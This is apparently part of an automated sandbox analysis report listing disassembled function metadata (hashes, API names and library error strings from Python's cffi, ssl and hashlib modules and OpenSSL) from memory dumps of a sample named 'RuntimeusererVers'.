                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e500000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Callable_CheckDeallocSize$BuildBytes_Err_FormatFromStringValue_memset
                                                                                                                                                                                                                                          • String ID: OOOO$expected a callable object for 'onerror', not %.200s$expected a callable object, not %.200s$expected a function ctype, got '%s'
                                                                                                                                                                                                                                          • API String ID: 2491357067-2441438866
                                                                                                                                                                                                                                          • Opcode ID: 7c70dcd237f5e7ce7d6ce722e7428266e549b894b627b6d0320301e6d50163e6
                                                                                                                                                                                                                                          • Instruction ID: 99b5f0b1b7bc968b71ef3e5fe2758401d98b87d45641dffe658400f90b5e8935
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7c70dcd237f5e7ce7d6ce722e7428266e549b894b627b6d0320301e6d50163e6
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 25413B72A08E42C2EA588F26ECA45A967A0BF49FE4F444635EE4E97764DF3CF545C300
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1578637831.00007FF81E131000.00000020.00000001.01000000.0000003B.sdmp, Offset: 00007FF81E130000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578429679.00007FF81E130000.00000002.00000001.01000000.0000003B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578694735.00007FF81E13D000.00000002.00000001.01000000.0000003B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578785676.00007FF81E14E000.00000004.00000001.01000000.0000003B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578942677.00007FF81E14F000.00000008.00000001.01000000.0000003B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1579030056.00007FF81E154000.00000004.00000001.01000000.0000003B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1579098759.00007FF81E155000.00000002.00000001.01000000.0000003B.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e130000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Err_$CertEnhancedErrorFromLastMallocMem_MemoryUsageWindows
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 2062549779-0
                                                                                                                                                                                                                                          • Opcode ID: 12b6369cfb41a87b3d6303cf481d217cc1837bdcb91c66c063b66c78bf323d75
                                                                                                                                                                                                                                          • Instruction ID: 04956d9d92c9b8b21f21dd8c5adab2db2af9aefd555b9726dde45d0c040f6613
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 12b6369cfb41a87b3d6303cf481d217cc1837bdcb91c66c063b66c78bf323d75
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 75310B21A0EE4282FA549F66A94893973A1BF44BF2B844234DE4F06790EF7CFCD59300
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1582033096.00007FF81E4E1000.00000020.00000001.01000000.00000037.sdmp, Offset: 00007FF81E4E0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1581472246.00007FF81E4E0000.00000002.00000001.01000000.00000037.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1582460342.00007FF81E4E7000.00000002.00000001.01000000.00000037.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1582744405.00007FF81E4EC000.00000004.00000001.01000000.00000037.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1582953118.00007FF81E4EE000.00000002.00000001.01000000.00000037.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e4e0000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Eval_ThreadThread_acquire_lock$Bytes_D_sizeDigestErr_FinalFromMemoryRestoreSaveSizeStringThread_release_lockX_copyX_freeX_mdX_new
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 2079540947-0
                                                                                                                                                                                                                                          • Opcode ID: a2b8b14961f38797a3619e0f4eaa5f011809f9229ab965e768560273712ee8ab
                                                                                                                                                                                                                                          • Instruction ID: 383642ad4909768097dc9b78b2ce70acf281c374783911e4da632101fbb4d5c2
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a2b8b14961f38797a3619e0f4eaa5f011809f9229ab965e768560273712ee8ab
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B9314B25E08F4386EB64DB22B85897963A1AF88FF1F544631DD4E47764EE3CF4A48300
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1582033096.00007FF81E4E1000.00000020.00000001.01000000.00000037.sdmp, Offset: 00007FF81E4E0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1581472246.00007FF81E4E0000.00000002.00000001.01000000.00000037.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1582460342.00007FF81E4E7000.00000002.00000001.01000000.00000037.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1582744405.00007FF81E4EC000.00000004.00000001.01000000.00000037.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1582953118.00007FF81E4EE000.00000002.00000001.01000000.00000037.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e4e0000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Eval_ThreadThread_acquire_lock$D_sizeDigestErr_FinalMemoryPy_strhexRestoreSaveThread_release_lockX_copyX_freeX_mdX_new
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 2842303453-0
                                                                                                                                                                                                                                          • Opcode ID: 9622d5fd6570988b44aa9672888ba2537df868c76e362c7ed53a6d9a9b7a11d7
                                                                                                                                                                                                                                          • Instruction ID: 2f12dce84d8662c77f9e2a1a378dc935517c117dd14469fc11dcaeabcd820f59
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9622d5fd6570988b44aa9672888ba2537df868c76e362c7ed53a6d9a9b7a11d7
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A4312725A08F4386EB64DB22B85897A63A1AFC8FF5F144631DD4E46764DE3CF4E48710
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1582033096.00007FF81E4E1000.00000020.00000001.01000000.00000037.sdmp, Offset: 00007FF81E4E0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1581472246.00007FF81E4E0000.00000002.00000001.01000000.00000037.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1582460342.00007FF81E4E7000.00000002.00000001.01000000.00000037.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1582744405.00007FF81E4EC000.00000004.00000001.01000000.00000037.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1582953118.00007FF81E4EE000.00000002.00000001.01000000.00000037.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e4e0000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Mem_$Free$X_free$Err_Memory$DigestFinalMallocPy_strhexX_copyX_new
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 422439089-0
                                                                                                                                                                                                                                          • Opcode ID: b2ab8a0d7e008b83c2d7629f2e51ae589ec2dfac3e9a1e52696f2ca71d4e8ac7
                                                                                                                                                                                                                                          • Instruction ID: 3b98d0631cecea333d017b2f24370b2467b0d283f9276adf60d19595739c7936
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b2ab8a0d7e008b83c2d7629f2e51ae589ec2dfac3e9a1e52696f2ca71d4e8ac7
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0421EC24B1CF4385EA54DB22B95883963A1AF89FF1B085634ED0F4B755EE2CF8E48350
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1583070422.00007FF81E501000.00000020.00000001.01000000.00000036.sdmp, Offset: 00007FF81E500000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583033638.00007FF81E500000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583104278.00007FF81E51C000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583140748.00007FF81E529000.00000004.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583198579.00007FF81E52F000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e500000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Err_Format$Unicode_memcpy
                                                                                                                                                                                                                                          • String ID: bytes or list or tuple$initializer bytes is too long for '%s' (got %zd characters)$initializer unicode is too long for '%s' (got %zd characters)$list or tuple$too many initializers for '%s' (got %zd)$unicode character out of range for conversion to char16_t: 0x%x$unicode or list or tuple
                                                                                                                                                                                                                                          • API String ID: 3046177526-3363920172
                                                                                                                                                                                                                                          • Opcode ID: 41510561d2cb898ddd984708ed58315be81fb0ad45eb54e4c9aa021a40eece95
                                                                                                                                                                                                                                          • Instruction ID: a166258785c83f143208b32cb3a8fdc0eb7b8fb326413cc8155c07cda4a587d7
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 41510561d2cb898ddd984708ed58315be81fb0ad45eb54e4c9aa021a40eece95
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: FD918831B09E42C2EA648B46DC702F92B61BB55BE4F844636EA0E57B91DF3DF9458301
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • EVP_PKEY_CTX_new.LIBCRYPTO-1_1(?,?,?,?,?,..\s\ssl\statem\statem_srvr.c,00007FF81E0E2510), ref: 00007FF81E0E0575
                                                                                                                                                                                                                                          • X509_get0_pubkey.LIBCRYPTO-1_1(?,?,?,?,?,..\s\ssl\statem\statem_srvr.c,00007FF81E0E2510), ref: 00007FF81E0E05E6
                                                                                                                                                                                                                                          • ERR_clear_error.LIBCRYPTO-1_1(?,?,?,?,?,..\s\ssl\statem\statem_srvr.c,00007FF81E0E2510), ref: 00007FF81E0E05FF
                                                                                                                                                                                                                                          • ASN1_item_d2i.LIBCRYPTO-1_1(?,?,?,?,?,..\s\ssl\statem\statem_srvr.c,00007FF81E0E2510), ref: 00007FF81E0E061E
                                                                                                                                                                                                                                          • ASN1_TYPE_get.LIBCRYPTO-1_1(?,?,?,?,?,..\s\ssl\statem\statem_srvr.c,00007FF81E0E2510), ref: 00007FF81E0E063B
                                                                                                                                                                                                                                          • EVP_PKEY_CTX_ctrl.LIBCRYPTO-1_1(?,?,?,?,?,..\s\ssl\statem\statem_srvr.c,00007FF81E0E2510), ref: 00007FF81E0E06EE
                                                                                                                                                                                                                                          • EVP_PKEY_CTX_free.LIBCRYPTO-1_1(?,?,?,?,?,..\s\ssl\statem\statem_srvr.c,00007FF81E0E2510), ref: 00007FF81E0E0744
                                                                                                                                                                                                                                          • ASN1_item_free.LIBCRYPTO-1_1(?,?,?,?,?,..\s\ssl\statem\statem_srvr.c,00007FF81E0E2510), ref: 00007FF81E0E0753
                                                                                                                                                                                                                                            • Part of subcall function 00007FF81E081C08: CRYPTO_malloc.LIBCRYPTO-1_1 ref: 00007FF81E0988C9
                                                                                                                                                                                                                                            • Part of subcall function 00007FF81E081C08: memset.VCRUNTIME140 ref: 00007FF81E0988F7
                                                                                                                                                                                                                                            • Part of subcall function 00007FF81E081C08: memcpy.VCRUNTIME140 ref: 00007FF81E098933
                                                                                                                                                                                                                                            • Part of subcall function 00007FF81E081C08: CRYPTO_clear_free.LIBCRYPTO-1_1 ref: 00007FF81E098956
                                                                                                                                                                                                                                            • Part of subcall function 00007FF81E081C08: CRYPTO_clear_free.LIBCRYPTO-1_1 ref: 00007FF81E0989BD
                                                                                                                                                                                                                                            • Part of subcall function 00007FF81E081C08: CRYPTO_clear_free.LIBCRYPTO-1_1 ref: 00007FF81E098A38
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1577633708.00007FF81E081000.00000020.00000001.01000000.0000003C.sdmp, Offset: 00007FF81E080000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1577554084.00007FF81E080000.00000002.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1577633708.00007FF81E0F4000.00000020.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1577887521.00007FF81E0F6000.00000002.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578021546.00007FF81E119000.00000008.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578087716.00007FF81E11D000.00000004.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578182269.00007FF81E11E000.00000002.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578182269.00007FF81E124000.00000002.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578182269.00007FF81E12B000.00000002.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e080000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: O_clear_free$E_getN1_item_d2iN1_item_freeO_mallocR_clear_errorX509_get0_pubkeyX_ctrlX_freeX_newmemcpymemset
                                                                                                                                                                                                                                          • String ID: $..\s\ssl\statem\statem_srvr.c$Q
                                                                                                                                                                                                                                          • API String ID: 2622237655-4085857157
                                                                                                                                                                                                                                          • Opcode ID: 29b83a6a0e9b2dcd0b987ecca7b7a48fca6c18b4ebd350d10a0bdae3980f98aa
                                                                                                                                                                                                                                          • Instruction ID: 6c890b1df8e24c20514fdf068402e7858b0f48e13f007a9657f881c062b29194
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 29b83a6a0e9b2dcd0b987ecca7b7a48fca6c18b4ebd350d10a0bdae3980f98aa
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 58617E72A08F4685EE60DB56E440BBA6790FF84BE4F144236EA8D477A5DF3CF9458B00
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1578637831.00007FF81E131000.00000020.00000001.01000000.0000003B.sdmp, Offset: 00007FF81E130000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578429679.00007FF81E130000.00000002.00000001.01000000.0000003B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578694735.00007FF81E13D000.00000002.00000001.01000000.0000003B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578785676.00007FF81E14E000.00000004.00000001.01000000.0000003B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578942677.00007FF81E14F000.00000008.00000001.01000000.0000003B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1579030056.00007FF81E154000.00000004.00000001.01000000.0000003B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1579098759.00007FF81E155000.00000002.00000001.01000000.0000003B.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e130000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Err_$Arg_FormatParse_SizeStringWarnX_ctrl
                                                                                                                                                                                                                                          • String ID: The context's protocol doesn't support modification of highest and lowest version.$Unsupported TLS/SSL version 0x%x$Unsupported protocol version 0x%x$ssl.TLSVersion.SSLv3 is deprecated$ssl.TLSVersion.TLSv1 is deprecated$ssl.TLSVersion.TLSv1_1 is deprecated
                                                                                                                                                                                                                                          • API String ID: 1675272777-3879554506
                                                                                                                                                                                                                                          • Opcode ID: 97aac6f85bb5bd767cdf60e76b43fb043aeb39cee9ba4b47f94ecca7f189989c
                                                                                                                                                                                                                                          • Instruction ID: 06e936b870206f9fa49fcc0a4ab58a83c72f68c037d150185f952e9c23a3b06f
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 97aac6f85bb5bd767cdf60e76b43fb043aeb39cee9ba4b47f94ecca7f189989c
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6A413021B1CD1285FA744B2AD854E352260BF417F2FA44331D91E42EE8EE6DFEC59701
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1583070422.00007FF81E501000.00000020.00000001.01000000.00000036.sdmp, Offset: 00007FF81E500000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583033638.00007FF81E500000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583104278.00007FF81E51C000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583140748.00007FF81E529000.00000004.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583198579.00007FF81E52F000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e500000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Buffer_$Err_Release$String$BufferContiguousFormatObject_
                                                                                                                                                                                                                                          • String ID: contiguous buffer expected$expected a pointer or array ctype, got '%s'$right operand length must match slice length
                                                                                                                                                                                                                                          • API String ID: 917851491-2344006768
                                                                                                                                                                                                                                          • Opcode ID: 492111c2bbd31e5275ce7ca080d06e27dd642f4512c10dab5b2d19e8721f73c9
                                                                                                                                                                                                                                          • Instruction ID: d22bee8431cec0d6ce6ef1f953a488d7f7e386228950af26c2b4294d56d4a2dd
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 492111c2bbd31e5275ce7ca080d06e27dd642f4512c10dab5b2d19e8721f73c9
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6541FA36A08E42C2EA24CB15ED601B973A0FF88BE4B984732E95E436A4DF7DF545C741
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1578637831.00007FF81E131000.00000020.00000001.01000000.0000003B.sdmp, Offset: 00007FF81E130000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578429679.00007FF81E130000.00000002.00000001.01000000.0000003B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578694735.00007FF81E13D000.00000002.00000001.01000000.0000003B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578785676.00007FF81E14E000.00000004.00000001.01000000.0000003B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578942677.00007FF81E14F000.00000008.00000001.01000000.0000003B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1579030056.00007FF81E154000.00000004.00000001.01000000.0000003B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1579098759.00007FF81E155000.00000002.00000001.01000000.0000003B.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e130000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Err_String$DeallocMem_$FormatFreeMallocUnicode_memcpy
                                                                                                                                                                                                                                          • String ID: password cannot be longer than %d bytes$unable to allocate password buffer
                                                                                                                                                                                                                                          • API String ID: 1570515377-2395793021
                                                                                                                                                                                                                                          • Opcode ID: 2b432fb3dce652f42f2c7472e24a173b684e3d89a83873c8256b8d33ac990114
                                                                                                                                                                                                                                          • Instruction ID: 39d4c23dc07b17b30934ae12762961f45a9727c72cb2bbc750c043b80c28a983
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2b432fb3dce652f42f2c7472e24a173b684e3d89a83873c8256b8d33ac990114
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: FD414931A09E42C6FA249B16E944139B7A5FB85FF2B494632CE1E47B94DF3CF4948300
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1582033096.00007FF81E4E1000.00000020.00000001.01000000.00000037.sdmp, Offset: 00007FF81E4E0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1581472246.00007FF81E4E0000.00000002.00000001.01000000.00000037.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1582460342.00007FF81E4E7000.00000002.00000001.01000000.00000037.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1582744405.00007FF81E4EC000.00000004.00000001.01000000.00000037.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1582953118.00007FF81E4EE000.00000002.00000001.01000000.00000037.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e4e0000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Err_String$Module_State
                                                                                                                                                                                                                                          • String ID: Missing required parameter 'digestmod'.$key is too long.
                                                                                                                                                                                                                                          • API String ID: 450183790-3184708805
                                                                                                                                                                                                                                          • Opcode ID: 20a4f4cc56f4df26beb6afd7a31a18035a1c8236dd24386be64b70811f72101a
                                                                                                                                                                                                                                          • Instruction ID: 82739752506c284a4e24c6b1d3bbb7828534f31ef8d94971f5e7ed95c5dfdcd9
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 20a4f4cc56f4df26beb6afd7a31a18035a1c8236dd24386be64b70811f72101a
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4A413D21E08F4385EA54DB16A858A79A3A1AF84FF0F484231DE5D47B64EF7CF4E58340
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1583070422.00007FF81E501000.00000020.00000001.01000000.00000036.sdmp, Offset: 00007FF81E500000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583033638.00007FF81E500000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583104278.00007FF81E51C000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583140748.00007FF81E529000.00000004.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583198579.00007FF81E52F000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e500000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Err_Format$AddressArg_ErrorLastParseProcSizeTuple___stdio_common_vsprintf
                                                                                                                                                                                                                                          • String ID: O!s:load_function$error 0x%x$function or pointer or array cdata expected, got '%s'$function/symbol '%s' not found in library '%s': %s$library '%s' has already been closed
                                                                                                                                                                                                                                          • API String ID: 1100265670-2543733793
                                                                                                                                                                                                                                          • Opcode ID: 3b97bb430ce2eb91d41ab64e4e1557df8f611ed7a621dc6a7b739cfdd32b130e
                                                                                                                                                                                                                                          • Instruction ID: 77a4bf42fe2cd9a34f9f63d7d76ce6943dae9bc770317b97aede51eb5026bd3c
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3b97bb430ce2eb91d41ab64e4e1557df8f611ed7a621dc6a7b739cfdd32b130e
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A4313C65A08E42C1EB08DB65EC603E9A3A0FF84BE4F441636E94D47665EF7CF499C340
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1583070422.00007FF81E501000.00000020.00000001.01000000.00000036.sdmp, Offset: 00007FF81E500000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583033638.00007FF81E500000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583104278.00007FF81E51C000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583140748.00007FF81E529000.00000004.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583198579.00007FF81E52F000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e500000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Dealloc$Object_$ClearRefsWeak$Buffer_ErrorFatalFuncReleaseTrack
                                                                                                                                                                                                                                          • String ID: cdata CDataOwningGC_Type with unexpected type flags$cdataowninggc_dealloc
                                                                                                                                                                                                                                          • API String ID: 2692969411-3398618105
                                                                                                                                                                                                                                          • Opcode ID: 13503a3c68720f0aa0e85bed88528fcca7d266cab3b43b27fb4dff52ce363361
                                                                                                                                                                                                                                          • Instruction ID: e14e5c4084ebf65d4279ffb427acce12de5154f32a499bd704f5616396861307
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 13503a3c68720f0aa0e85bed88528fcca7d266cab3b43b27fb4dff52ce363361
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8C31B836A08E46C2EB589F66ED642B827A4FB88BF5F155231DA4E06764CF3DF4558300
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1577633708.00007FF81E081000.00000020.00000001.01000000.0000003C.sdmp, Offset: 00007FF81E080000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1577554084.00007FF81E080000.00000002.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1577633708.00007FF81E0F4000.00000020.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1577887521.00007FF81E0F6000.00000002.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578021546.00007FF81E119000.00000008.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578087716.00007FF81E11D000.00000004.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578182269.00007FF81E11E000.00000002.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578182269.00007FF81E124000.00000002.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578182269.00007FF81E12B000.00000002.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e080000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: T_free$P_resp_count$E_freeL_sk_new_nullP_freeP_get1_ext_d2iP_resp_get0P_response_get1_basicR_put_errorX509_get_ext_d2id2i_
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 2393059476-0
